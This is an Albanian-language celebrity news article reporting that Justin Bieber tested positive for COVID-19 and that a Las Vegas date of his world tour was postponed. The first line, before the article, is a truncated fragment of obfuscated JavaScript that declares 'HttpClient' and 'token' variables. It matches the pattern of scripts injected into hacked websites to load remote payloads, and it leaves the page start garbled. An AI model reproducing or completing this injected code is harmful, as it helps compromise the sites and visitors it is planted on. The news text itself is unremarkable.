;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Për shkak të Covid-19, këngëtari i njohur detyrohet të anulojë koncertin e planifikuar

By

Turneu botëror i Justin Bieber është goditur nga COVID-19.

Një përfaqësues i këngëtarit konfirmon për “People” se këngëtari ka rezultuar pozitiv me koronavirus.

Të shtunën, u njoftua se shfaqja në Las Vegas e planifikuar për të dielën ishte shtyrë pas një shpërthimi të COVID-19, brenda ekipit të yllit të popit 27-vjeçar.

Performanca është riplanifikuar për 28 qershor. Rimbursimet do të vihen në dispozicion në pikën e blerjes, sipas një deklarate të postuar në Twitter.

“Për shkak të rezultateve pozitive të COVID brenda familjes së Justice Tour, ne për fat të keq, do të duhet të shtyjmë shfaqjen e së dielës në Las Vegas,” thuhej në deklaratë. “Justin është, sigurisht, jashtëzakonisht i zhgënjyer, por shëndeti dhe siguria e ekuipazhit dhe fansave të tij është gjithmonë prioriteti i tij numër një”.

Turneu i cili fillimisht ishte planifikuar të fillonte në mars të vitit 2020, ishte shtyrë gati dy vjet për shkak të pandemisë COVID-19.

Bieber nisi koncertin e parë të premten në San Diego. Las Vegas ishte ndalesa e dytë e turneut, i cili zgjat deri në mars 2023.

“Nisja e turneut në San Diego ishte një sukses masiv dhe Justin është i emocionuar për të sjellë këtë shfaqje spektakolare për fansat e tij në Las Vegas sa më shpejt të jetë e mundur,” shtohet deklarata.

Turneu botëror i Bieber do të mbahet në 20 vende të ndryshme në 13 muaj, sipas faqes së tij të internetit.

Artikuj të ngjashëm